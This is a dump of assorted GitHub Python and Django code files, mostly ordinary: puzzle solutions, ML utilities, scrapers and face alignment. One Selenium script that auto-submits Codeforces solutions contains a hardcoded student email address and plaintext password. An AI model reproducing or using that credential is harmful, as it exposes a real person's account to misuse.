+{"seq_id":"18943600607","text":"from clustering.user import User\nfrom clustering.features import (bag_of_words, bag_of_hashtags,\n user_retweet_related)\n# from clustering.features import (bag_of_bigrams, user_description,\n# user_location, user_name, user_is_verified, user_sum_favourites,\n# user_sum_retweet_count)\nfrom sklearn.cluster import KMeans\nfrom sklearn.pipeline import Pipeline\nfrom featureforge.vectorizer import Vectorizer\n# from sklearn.preprocessing import StandardScaler\n\n\nclass Model(object):\n 
\"\"\"Clusters Twitter users with K-means over features built from their tweets.\"\"\"\n\n    def __init__(self, tweets):\n        self.tweets = tweets\n        self.users = users = dict()\n        self.get_users()\n        features = [\n            bag_of_words,\n            bag_of_hashtags,\n            user_retweet_related(users),\n            # user_description,\n            # bag_of_bigrams,\n            # user_location,\n            # user_name,\n            # user_is_verified,\n            # user_sum_favourites,\n            # user_sum_retweet_count,\n        ]\n        vect = Vectorizer(features)\n        # scaler = StandardScaler(with_mean=False)\n        clf = KMeans(init='k-means++', n_clusters=8)\n        # self.pipeline = Pipeline(steps=[('vect', vect), ('scl', scaler), ('clf', clf)])\n        self.pipeline = Pipeline(steps=[('vect', vect), ('clf', clf)])\n        self.users_list = list(users.values())\n        self.pipeline.fit(self.users_list)\n        self.labels = self.pipeline.steps[1][1].labels_\n\n    def get_users(self):\n        users = self.users\n        for tweet in self.tweets:\n            if tweet['text'][:2] != 'RT':\n                tweet['is_retweet'] = False\n                self.add_user(tweet)\n            else:\n                # if it is a retweet, also add the user who created the original tweet.\n                try:\n                    # this field may be missing; in that case we ignore the tweet.\n                    source_tweet = tweet['retweeted_status']\n                except KeyError:\n                    continue\n\n                source_tweet['is_retweet'] = False\n                tweet['is_retweet'] = True\n                tweet['text'] = None  # source_tweet['text']\n                self.add_user(tweet)\n                self.add_user(source_tweet)\n\n                # update the retweet-related attributes\n                uid = tweet['user']['id']\n                retweeted_uid = source_tweet['user']['id']\n                users[uid].retweeted_to.append(retweeted_uid)\n                users[retweeted_uid].retweeted_by.append(uid)\n\n    def add_user(self, tweet):\n        users = self.users\n        user_id = tweet['user']['id']\n        if user_id in users.keys():\n            u = users[user_id]\n            u.update(tweet)\n        else:\n            u = User(tweet)\n            users[user_id] = u\n\n        return users\n","repo_name":"acapello/PLN-2015","sub_path":"clustering/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"15019971899","text":"N = int(input())\r\nimos = [0 for i in range(1443)]\r\n \r\ndef mystart(a_minute):\r\n    while(1):\r\n        if a_minute % 5 == 0 : break\r\n        a_minute -=1\r\n    return a_minute\r\n \r\ndef myend(a_minute):\r\n    while(1):\r\n        if a_minute % 5 == 0 : break\r\n        a_minute += 1\r\n    return a_minute\r\n \r\ndef output_time(a_minute):\r\n    h = a_minute // 60\r\n    h = '%02d'% h\r\n    m = a_minute % 60\r\n    m = '%02d'% m\r\n    return h+m \r\n\r\nnums = []\r\n\r\nfor i in range(N):\r\n    time = [t for t in input().split(\"-\")]\r\n    time = [int(t[:2])*60 + int(t[2:]) for t in time]\r\n    time = [mystart(time[0]),myend(time[1])]\r\n    nums.append(time)\r\n    \r\nfor n in nums:\r\n    imos[n[0]] += 1\r\n    imos[n[1]+1] -= 1\r\n\r\nans = []\r\nj = 0\r\nfor i in imos:\r\n    ans.append(j+i)\r\n    j += i\r\n    \r\nstart,end,flag = 0,0,False\r\n \r\nfor i in range(len(ans)):\r\n    if ans[i] == 0 and flag == False : continue\r\n    elif ans[i] == 0 and flag == True:\r\n        end = i\r\n        print(output_time(start) + \"-\" + output_time(end-1))\r\n        start,end,flag = 0,0,False\r\n    elif ans[i] != 0 and flag == False :\r\n        start = i\r\n        flag = True\r\n    else:\r\n        continue","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc001/D/4924158.py","file_name":"4924158.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"42964415598","text":"from django.urls import path\nfrom . 
import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n    path('', views.index, name='home'),\n    path('about', views.about, name='about'),\n    path('register', views.register, name='register'),\n    path('login', views.login_view, name='login'),\n\n    path('students_courses', views.students_courses, name='students_courses'),\n    path('ege_courses', views.ege_courses, name='ege_courses'),\n    path('course_edit', views.course_edit, name='course_edit'),\n    path('course_delete/', views.course_delete, name='course_delete'),\n    path('course_add', views.course_add, name='course_add'),\n    path('course_subscription//', views.course_subscription, name='course_subscription'),\n    path('my_courses', views.my_courses, name='my_courses'),\n    path('course_details/', views.course_details, name='course_details'),\n\n    path('course//delete/', views.course_delete_from_my_list, name='course_delete_from_my_list'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Danila-Timonin/Lab3","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23424750470","text":"import os\nimport time\nimport sys\n# comment out below line to enable tensorflow outputs\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom core.functions import *\nfrom polytrack.track import track\nfrom polytrack.bg_subtraction import foreground_changes\nfrom polytrack.record import record_track, complete_tracking\nfrom polytrack.config import pt_cfg\nfrom polytrack.flowers import record_flowers\nfrom polytrack.general import *\nimport cv2\nimport numpy as np\n# import warnings; warnings.simplefilter('ignore')\nfrom datetime import datetime\nfrom absl import app\n\n\ndef main(_argv):\n    start_time = datetime.now()\n    start_time_py = time.time()\n    print(\"Start: \" + str(start_time))\n    nframe = 0\n    # total_frames = 0\n    # flowers_recorded = False\n    predicted_position = []  # needed by complete_tracking() after the loop\n\n    video_list = get_video_list(pt_cfg.POLYTRACK.INPUT_DIR, pt_cfg.POLYTRACK.VIDEO_EXT)\n\n    for video_name in video_list:\n        \n        print('===================' + str(video_name) + '===================')\n\n        video = str(pt_cfg.POLYTRACK.INPUT_DIR) + str(video_name)\n\n        # begin video capture\n        try:\n            vid = cv2.VideoCapture(int(video))\n        except:\n            vid = cv2.VideoCapture(video)\n\n        \n        width, height, _ = get_video_details(vid)\n        converter = cv2.VideoWriter(str(pt_cfg.POLYTRACK.OUTPUT)+str(video_name)+'.avi', cv2.VideoWriter_fourcc(*'DIVX'), 30, (width, height))\n        \n        while True:\n            return_value, frame = vid.read()\n            if return_value:\n                nframe += 1\n\n                \n                # cv2.imshow(\"frame\", frame)\n                converter.write(frame)\n\n                # idle = check_idle(nframe, predicted_position)\n                # insectsBS = foreground_changes(frame, width, height, nframe, idle)\n                # associated_det_BS, associated_det_DL, missing,new_insect = track(frame, predicted_position, insectsBS)\n                # for_predictions = record_track(frame, nframe,associated_det_BS, associated_det_DL, missing, new_insect, idle)\n                # predicted_position = predict_next(for_predictions)\n\n                fps = round(nframe/ (time.time() - start_time_py),2)\n                print(str(nframe) + ' frames processed | ' + str(fps) +' FPS ' , end='\\r')\n\n\n                if cv2.waitKey(1) & 0xFF == ord('q'): break\n            \n            else:\n                print()\n                print('Video has ended')\n                break\n\n        if not pt_cfg.POLYTRACK.CONTINUOUS_VIDEO:\n            pass\n            # complete_tracking(predicted_position)\n            # predicted_position =[]\n
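            # per-clip reset of tracking state (kept for reference, disabled in this converter build):\n            # 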
pt_cfg.POLYTRACK.RECORDED_DARK_SPOTS = []\n            # flowers_recorded = False\n            \n\n        cv2.destroyAllWindows()\n    complete_tracking(predicted_position)\n    end_time = datetime.now()\n    print()\n    print(\"End: \" + str(end_time))\n    print(\"Processing Time: \" + str(end_time-start_time))\n\n\n\n\n\nif __name__ == '__main__':\n    try:\n        app.run(main)\n    except SystemExit:\n        pass\n\n","repo_name":"malikaratnayake/Polytrack2.0","sub_path":"video_converter.py","file_name":"video_converter.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"14201891881","text":"from math import sqrt\n\n\ndef prime(number):\n    if number <= 3:\n        return number > 1\n    elif number % 2 == 0 or number % 3 == 0:\n        return False\n    i = 5\n    while i ** 2 <= number:\n        if number % i == 0 or number % (i + 2) == 0:\n            return False\n        i += 6\n    return True\n\n\ndef nexttopright(value):\n    n = (sqrt(value) - 1) / 2\n    return int((2*(n+1) + 1) ** 2)\n\n\ndef nextbotright(value):\n    n = (sqrt(4*value - 3) + 1) / 4\n    return int(4*((n+1) ** 2) - 2*(n+1) + 1)\n\n\ndef nextbotleft(value):\n    n = (sqrt(value - 1)) / 2\n    return int(4*((n+1)**2) + 1)\n\n\ndef nexttopleft(value):\n    n = (sqrt(4*value - 3) - 1) / 4\n    return int(4*((n+1) ** 2) + 2*(n+1) + 1)\n\n\ntarget = 10\n\nspiralsize = 7 # initial spiral size\nseqlength = (spiralsize // 2) + 1 # length of diagonals from centre given spiral size\n\ntopright = [(2*n + 1)**2 for n in range(seqlength)] # sequence (2n+1)^2 OR 4n^2 + 4n + 1\nbotright = [(4*(n**2) - 2*n + 1) for n in range(1, seqlength)] # sequence 4n^2 - 2n + 1\nbotleft = [(4*(n**2) + 1) for n in range(1, seqlength)] # sequence 4n^2 + 1\ntopleft = [(4*(n**2) + 2*n + 1) for n in range(1, seqlength)] # sequence 4n^2 + 2n +1\n\ntoprightp = [prime(v) for v in topright]\nbotrightp = [prime(v) for v in botright]\nbotleftp = [prime(v) for v in botleft]\ntopleftp = [prime(v) for v in topleft]\n\ncurrentsize = spiralsize\nfound = False\nwhile not found:\n    allpbools = list(toprightp) + list(botrightp) + list(botleftp) + list(topleftp)\n    noprime, total = allpbools.count(True), len(allpbools)\n    ratiopercent = noprime / total * 100\n    if ratiopercent < target:\n        found = True\n        break\n    else:\n        currentsize += 2\n        topright.append(nexttopright(topright[-1]))\n        botright.append(nextbotright(botright[-1]))\n        botleft.append(nextbotleft(botleft[-1]))\n        topleft.append(nexttopleft(topleft[-1]))\n\n        toprightp.append(prime(topright[-1]))\n        botrightp.append(prime(botright[-1]))\n        botleftp.append(prime(botleft[-1]))\n        topleftp.append(prime(topleft[-1]))\n\nprint(\"First spiral side length to have 10 percent or fewer primes along diagonals: %s\" % currentsize)\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#58 - Spiral Primes.py","file_name":"#58 - Spiral Primes.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36518468032","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n   File Name:     deleteNode\n   Description :\n   Author :       lwq\n   date: 2019-07-24\n-------------------------------------------------\n   Change Activity:\n                   2019-07-24:\n-------------------------------------------------\n\"\"\"\n__author__ = 'lwq'\n\n\"\"\"\nRemove the N-th node from the end of a linked list\nGiven a linked list, remove the n-th node from the end of the list and return the head of the list.\n\nExample:\n\nGiven the linked list: 1->2->3->4->5, and n = 2.\n\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\n\nThe given n is guaranteed to be valid.\n\nFollow-up:\n\nCan you try to do this in a single pass?\n\"\"\"\n\n\n
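# Approach (single pass): advance a lead pointer n nodes ahead, then move lead\n# and trail together; when the lead reaches the tail, the trailing pointer sits\n# just before the node to remove.\n\n# Definition 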
for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\nclass Solution:\n    def removeNthFromEnd(head,n):\n        \"\"\"\n        :type head: ListNode\n        :type n: int\n        :rtype: ListNode\n        \"\"\"\n        pre = head\n        cur = head\n        for i in range(n):\n            cur = cur.next\n\n        if cur:\n            while cur.next:\n                cur = cur.next\n                pre = pre.next\n            pre.next = pre.next.next\n            return head\n        else:\n            return pre.next\n\n\nif __name__ == '__main__':\n    a = ListNode(1)\n    b = ListNode(2)\n    c = ListNode(3)\n    d = ListNode(4)\n    a.next = b\n    b.next = c\n    c.next = d\n    tmp_a = a\n\n    while (tmp_a):\n        print(tmp_a.val)\n        tmp_a = tmp_a.next\n\n    a = Solution.removeNthFromEnd(a, 2)  # rebind the head in case the first node was removed\n    print(\"+\" * 20)\n\n    while (a):\n        print(a.val)\n        a = a.next\n","repo_name":"Lwq1997/leetcode-python","sub_path":"primary_algorithm/list/removeNthFromEnd.py","file_name":"removeNthFromEnd.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23981373430","text":"import yaml\n\nwith open(\"info.yaml\") as f:\n\tdoc = yaml.safe_load(f)\n\ntop_name = doc[\"project\"][\"top_module\"]\n\nwith open(\"src/top.v\", \"w\") as f2:\n\twith open(\"src/top_r.v\") as f:\n\t\twhile True:\n\t\t\tline = f.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tf2.write(line)\n\t\tf2.write(\"\\n\")\n\twith open(\"src/top_template.v\") as f:\n\t\twhile True:\n\t\t\tline = f.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tline = line.replace(\"{namehere}\", top_name)\n\t\t\tf2.write(line)\n\t\tf2.write(\"\\n\")\n","repo_name":"AvalonSemiconductors/tt04-logisim-auto","sub_path":"scripts/gen_toplevel.py","file_name":"gen_toplevel.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71901949673","text":"import time\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport os\r\nfrom selenium.webdriver.common.by import By\r\n\r\ndriver = webdriver.Chrome()\r\ndef register(email='abdelrahim.abdelaal@student.guc.edu.eg',password='ilovecode303'):\r\n\r\n\turl = \"https://codeforces.com/enter?back=%2F\"\r\n\tdriver.get(url)\r\n\tdriver.find_element(By.ID,\"handleOrEmail\").send_keys(email)\r\n\tdriver.find_element(By.ID,\"password\").send_keys(password)\r\n\ttime.sleep(1)\r\n\tstr=\"/html/body/div[7]/div[4]/div/div/div/form/table/tbody/tr[4]/td/input\"\r\n\tstr2=r'//*[@id=\"enterForm\"]/table/tbody/tr[4]/td/div[1]/input'\r\n\tdriver.find_element(By.XPATH,str2).click()\r\n\ttime.sleep(5)\r\n\tprint(\"done\")\r\n\r\nregister()\r\n\r\n\r\n\r\n\r\ndef solve(id):\r\n\tlanguages = [\"GNU G++17 7.3.0\",\"Java 17 64bit\",\"PyPy 3.6.9 (7.3.0)\"]\r\n\t# extensions = ['cpp','java','py']\r\n\t# split the id (e.g. 1700A) into its numeric and letter parts; currently unused below\r\n\tpart1=\"\"\r\n\tpart2=\"\"\r\n\tl=len(id)\r\n\tfor x in range(l):\r\n\t\tif id[x].isdigit():\r\n\t\t\tpart1+=id[x]\r\n\t\telse :\r\n\t\t\tpart2=id[x:]\r\n\t\t\tbreak\r\n\r\n\r\n\tdriver.get('https://codeforces.com/problemset/submit' )\r\n\r\n\tpath_of_the_problem=f\"C:\\\\Users\\DELL\\\\Desktop\\solutions\\\\bard\\\\cpp\\\\{id}.cpp\"\r\n\r\n\r\n\t#to submit 
file\r\n\r\n\tdriver.find_element(By.XPATH,'//*[@id=\"pageContent\"]/form/table/tbody/tr[1]/td[2]/input').send_keys(id)\r\n\tdropDown=Select(driver.find_element(By.XPATH,'//*[@id=\"pageContent\"]/form/table/tbody/tr[3]/td[2]/select'))\r\n\tdropDown.select_by_visible_text(languages[0])\r\n\tfile_input=driver.find_element(By.XPATH,'//*[@id=\"pageContent\"]/form/table/tbody/tr[5]/td[2]/input')\r\n\ttime.sleep(5)\r\n\tfile_input.send_keys(path_of_the_problem)\r\n\ttime.sleep(5)\r\n\tdriver.find_element('xpath',\"//input[@value='Submit']\").click()\r\n\ttime.sleep(6)\r\ncnt=0\r\nfor root_dir, cur_dir, files in os.walk(f\"C:\\\\Users\\\\DELL\\\\Desktop\\\\solutions\\\\bard\\\\cpp\"):\r\n\tfor i in range(len(files)):\r\n\t\tprint(files[i].split(\".\")[0])\r\n\t\tsolve(files[i].split('.')[0])\r\n\t\tcnt+=1\r\n\t\tprint(cnt,'/',len(files))\r\n\r\n\r\n\r\n","repo_name":"abdoo303/AI-and-Problem-Solving","sub_path":"problem_submitter.py","file_name":"problem_submitter.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38076166339","text":"\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport urllib.request\n\n'''\n셀레니움을 활용한 웹 크롤링\n'''\n\n# 크롬 드라이버를 불러와서 driver 변수로 저장\ndriver = webdriver.Chrome('/Users/youngseonkim/Documents/crawling_practice/chromedriver')\n\n# 크롬을 실행해서 이동하고자하는 URL 주소로 실행\ndriver.get(\"https://www.youtube.com\")\n\n# HTML 태그중 name == search_query 인 태그를 가져옴 \nelem = driver.find_element_by_name(\"search_query\")\n\n# 해당 태그에 input 값을 임의로 지정\nelem.send_keys(\"I can't stop me 커버\")\n\n# Enter 치는 것과 같은 역할 수행\nelem.send_keys(Keys.RETURN)\n\n# 3초동안 코드 진행을 멈춤, 브라우저가 로딩될 때 까지 기다리기 위해 사용\ntime.sleep(3)\n\n# Scroll Down 하는 코드\nSCROLL_PAUSE_TIME = 1.0\n\n# Get scroll height\nlast_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nwhile True:\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n \n\n\n# css class 중 입력된 값에 해당하는 태그를 찾아 첫번째 element를 클릭한다\n# driver.find_elements_by_css_selector(\".style-scope.yt-img-shadow\")[0].click()\n\n# css class 중 입력된 값에 해당하는 태그를 찾아 src attribute의 src를 가져옴\n# driver.find_element_by_css_selector(\".style-scope.yt-img-shadow\").get_attribute(\"src\")\n\n# urllib.request.urlretrieve(img_url, \"test.jpg\")\n# img = driver.find_element_by_tag_name(\"img\")\nimages = driver.find_elements_by_css_selector(\"img.style-scope.yt-img-shadow\")\n\ncount = 1\nthumbnail_num = 1\nfor image in images:\n try:\n img_url = image.get_attribute(\"src\")\n print(img_url)\n urllib.request.urlretrieve(img_url, str(thumbnail_num) + '.jpg')\n thumbnail_num += 1\n except:\n pass\ndriver.close()\n\n","repo_name":"ysk1026/youtube_crawling","sub_path":"google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25904588929","text":"#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport argparse\nimport json\nimport copy\nimport re\n\nimport pprint as pp\n\nfrom boxscore_cli.tools_mlbapi import *\nfrom boxscore_cli.tools_linescore import *\nfrom boxscore_cli.tools_boxscore 
import *\nfrom boxscore_cli.tools_boxscore import *\nfrom boxscore_cli.extractors_boxscore import *\nfrom boxscore_cli.formatters_linescore import *\nfrom boxscore_cli.formatters_boxscore import *\n\n\ndef print_linescore(gamePk, debug=False, wide=False):\n game_data = download_game_data(gamePk, debug=debug)\n dense_lines, _ = format_linescore(\n extract_linescore_innings(game_data),\n extract_teams_data(game_data),\n venue=extract_venue_name(game_data),\n decision_dict=extract_decisions(game_data),\n wide_display=wide,\n )\n print()\n [print(line) for line in dense_lines]\n print()\n\n\ndef main():\n ### parse CLI arguments\n\n parser = argparse.ArgumentParser(\n prog=\"boxscore\",\n description=\"cfrontin's CLI boxscore and linescore printer\",\n epilog=\"strike three!\\a\\n\",\n )\n parser.add_argument(\"-l\", \"--line\", action=\"store_true\", default=False)\n parser.add_argument(\"-b\", \"--box\", action=\"store_true\", default=False)\n parser.add_argument(\"-g\", \"--game\", action=\"store\", default=None, type=int)\n parser.add_argument(\"-w\", \"--wide\", action=\"store_true\", default=False)\n parser.add_argument(\"--debug\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n ### do functionality\n\n if args.line:\n print_linescore(args.game, debug=args.debug, wide=args.wide)\n\n if args.box:\n game_data = download_game_data(args.game, debug=args.debug)\n print(\"\\n\")\n print(extract_gamedate(game_data))\n print(extract_venue_name(game_data))\n print()\n lines_dense, lines_sparse = format_linescore(\n extract_linescore_innings(game_data),\n extract_teams_data(game_data),\n use_top_spacing_line=False,\n use_bottom_spacing_line=False,\n horz_char=\" \",\n vert_char=\" \",\n cross_char=\" \",\n wide_display=args.wide,\n )\n do_dense = True\n if do_dense:\n [print(line) for line in lines_dense]\n else:\n [print(line) for line in lines_sparse]\n print()\n batter_list = extract_boxscore_batter(game_data)\n pitcher_list = extract_boxscore_pitcher(game_data)\n line_batters_dict = format_batters(batter_list, wide_display=args.wide)\n line_pitchers_dict = format_pitchers(pitcher_list, wide_display=args.wide)\n for tmkey in (\"away\", \"home\"):\n print(\" \", extract_teams_data(game_data)[tmkey], sep=\"\")\n print()\n [print(x) for x in line_batters_dict[tmkey]]\n print()\n [print(x) for x in line_pitchers_dict[tmkey]]\n print()\n info_line_tmkey = extract_info_team(game_data, home_team=(tmkey == \"home\"))\n [\n print(x)\n for x in format_info_team(info_line_tmkey, wide_display=args.wide)\n ]\n print()\n info_line_box = extract_info_box(game_data)\n [print(x) for x in format_info_box(info_line_box, wide_display=args.wide)]\n print()\n\n if args.game and (not args.line) and (not args.box): # exploration mode\n game_data = download_game_data(args.game, debug=args.debug)\n print()\n pp.pprint(game_data, compact=True, indent=1, depth=2)\n # print()\n # pp.pprint(extract_linescore_data(game_data), compact=True, indent=1, depth=2)\n # print()\n # print(extract_teams_data(game_data)[\"away\"])\n # print(extract_teams_data(game_data)[\"home\"])\n # print()\n # print(extract_linescore_innings(game_data))\n # print()\n # print([x.get_appetite() for x in extract_linescore_innings(game_data)])\n # print()\n # lines_dense, lines_sparse = format_linescore(\n # extract_linescore_innings(game_data),\n # extract_teams_data(game_data),\n # venue=extract_venue_name(game_data),\n # decision_dict=extract_decisions(game_data),\n # )\n # print(\"dense linescore:\\n\")\n # [print(x) for x 
in lines_dense]\n # print()\n # print(\"sparse linescore:\\n\")\n # [print(x) for x in lines_sparse]\n # print()\n # print(translate_gamepk2url(args.game))\n # print()\n # print(extract_decisions(game_data))\n # print()\n print()\n pp.pprint(extract_boxscore_data(game_data), compact=True, indent=1, depth=2)\n print(\"\\n\")\n print(extract_gamedate(game_data))\n print(extract_venue_name(game_data))\n print()\n lines_dense, lines_sparse = format_linescore(\n extract_linescore_innings(game_data),\n extract_teams_data(game_data),\n use_top_spacing_line=False,\n use_bottom_spacing_line=False,\n horz_char=\" \",\n vert_char=\" \",\n cross_char=\" \",\n )\n do_dense = True\n if do_dense:\n [print(line) for line in lines_dense]\n else:\n [print(line) for line in lines_sparse]\n print()\n print(\" \", extract_teams_data(game_data)[\"away\"], sep=\"\")\n print()\n away_info = extract_info_team(game_data, home_team=False)\n [print(line) for line in format_info_team(away_info)]\n print(\"\\n\")\n print(\" \", extract_teams_data(game_data)[\"home\"], sep=\"\")\n print()\n home_info = extract_info_team(game_data, home_team=True)\n [print(line) for line in format_info_team(home_info)]\n print()\n box_info = extract_info_box(game_data)\n [print(line) for line in format_info_box(box_info)]\n print(\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cfrontin/boxscore-cli","sub_path":"boxscore_cli/boxscore.py","file_name":"boxscore.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37603667931","text":"import re\n\n# TextPreprocessing class contains a constructor, question_tag function\n# and stop_word function, question_tag function detects the type of question\n# tag present in the query and stop_word function is used to remove stop words\n# from the user query\n\n\nclass TextPreprocessing:\n def __init__(self):\n pass\n\n # user-defined question_tag function\n # used to detect type of question tag\n # in user query and returns the question tag\n # along with a list containing all possible question tags\n def question_tag(self, query):\n ques_tag = \"\"\n list_ques_tag = ['what', 'What', 'who', 'Who', 'when', 'When',\n 'where', 'Where', 'which', 'Which', 'how', 'How', 'Whom', 'whom']\n # finding the words starting with 'w' or 'W' in the query\n regex = re.findall(r\"\\b[wW]h\\w+|how|How\", query)\n for i in regex:\n ques_tag += i\n return ques_tag, list_ques_tag\n\n # user-defined stop_word function\n # This function is used for punctuation removal,\n # Wh-question removal, stop-word removal and,\n # capitalizing words in the user query\n # returns a refined query containing no stop words\n def stop_word(self, query):\n # importing third-party libraries\n import string\n import nltk\n from nltk.corpus import stopwords\n from nltk.tokenize import word_tokenize\n from spacy.lang.en import English\n # Punctuation removal\n query = query.translate(str.maketrans('', '', string.punctuation))\n # Wh-question removal\n query_array = query.split()\n reg = re.findall(\n r\"\\b[wW]h\\w+|how|How|define|Define|Explain|explain\", query)\n for i in reg:\n if i in query_array:\n query_array.remove(i)\n query = \"\"\n for i in query_array:\n query += i+\" \"\n\n # stop word removal\n stop_words = set(stopwords.words('english'))\n word_tokens = word_tokenize(query)\n filtered_sentence = [w for w in word_tokens if not w in stop_words]\n string_text = \"\"\n for i in filtered_sentence:\n string_text += 
i+\" \"\n\n # capitalize the words\n query_array = string_text.split()\n output = \"\"\n for i in query_array:\n i = i.capitalize()\n output += i+\" \"\n return output\n","repo_name":"rohit3644/IQAS","sub_path":"textpreprocessing.py","file_name":"textpreprocessing.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8813644425","text":"import cv2\nimport numpy as np\nimport dlib\nimport matplotlib.pyplot as plt\nimport math\n\n''' Face Alignment using the 5-point model.'''\n\n\n# In the 5-point model, the landmark points consists of 2 points at the corners of the eye\n# for each eye and one point on the nose-tip\n\n\ndef face_Detector(image):\n faceDetector = dlib.get_frontal_face_detector()\n faceBboxes = faceDetector(image, 0)\n print(\"Number of faces detected: \", len(faceBboxes))\n return faceBboxes\n\n\ndef land_marks(image, faceBboxes):\n predictorPath = 'models/shape_predictor_5_face_landmarks.dat'\n landMarkDetector = dlib.shape_predictor(predictorPath)\n for i in range(len(faceBboxes)):\n bbox = dlib.rectangle(int(faceBboxes[i].left()), int(faceBboxes[i].top()), int(faceBboxes[i].right()),\n int(faceBboxes[i].bottom()))\n landMarks = landMarkDetector(image, bbox)\n points = []\n for p in landMarks.parts():\n point = (p.x, p.y)\n points.append(point)\n points = np.array(points)\n return points\n\n\ndef similarity_transform(eyecornerSrc, eyecornerDst):\n s60 = math.sin(60 * math.pi / 180)\n c60 = math.cos(60 * math.pi / 180)\n\n inPts = np.copy(eyecornerSrc).tolist()\n outPts = np.copy(eyecornerDst).tolist()\n\n # The third point is calculated so that the three points make an equilateral triangle\n xin = c60 * (inPts[0][0] - inPts[1][0]) - s60 * (inPts[0][1] - inPts[1][1]) + inPts[1][0]\n yin = s60 * (inPts[0][0] - inPts[1][0]) + c60 * (inPts[0][1] - inPts[1][1]) + inPts[1][1]\n\n inPts.append([int(xin), int(yin)])\n\n xout = c60 * (outPts[0][0] - outPts[1][0]) - s60 * (outPts[0][1] - outPts[1][1]) + outPts[1][0]\n yout = s60 * (outPts[0][0] - outPts[1][0]) + c60 * (outPts[0][1] - outPts[1][1]) + outPts[1][1]\n\n outPts.append([int(xout), int(yout)])\n\n # Now we can use estimateRigidTransform for calculating the similarity transform.\n transform = cv2.estimateAffinePartial2D(np.array([inPts]), np.array([outPts]))\n return transform[0]\n\n\ndef alignment(size, image, points):\n h, w = size\n if len(points) == 68:\n eyecornerSrc = [points[36], points[45]]\n elif len(points) == 5:\n eyecornerSrc = [points[2], points[0]]\n # Corners of the eye in normalized image\n eyecornerDst = [(int(0.3 * w), int(h / 3)),\n (int(0.7 * w), int(h / 3))]\n\n transform = similarity_transform(eyecornerSrc, eyecornerDst)\n result = np.zeros(image.shape, dtype=image.dtype)\n result = cv2.warpAffine(image, transform, (w, h))\n points2 = np.reshape(points,\n (points.shape[0], 1, points.shape[1]))\n\n pointsOut = cv2.transform(points2, transform)\n\n pointsOut = np.reshape(pointsOut,\n (points.shape[0], points.shape[1]))\n return result, pointsOut\n\n\nif __name__ == \"__main__\":\n image = cv2.imread(\"images/face1.png\")\n faceBboxes = face_Detector(image)\n points = land_marks(image, faceBboxes)\n h = 600\n w = 600\n im = np.float32(image) / 255.0\n res, points = alignment((h, w), im, points)\n res = np.uint8(res * 255)\n plt.figure(figsize=(20, 8))\n plt.imshow(res[:, :, ::-1])\n plt.title(\"Aligned Image\")\n 
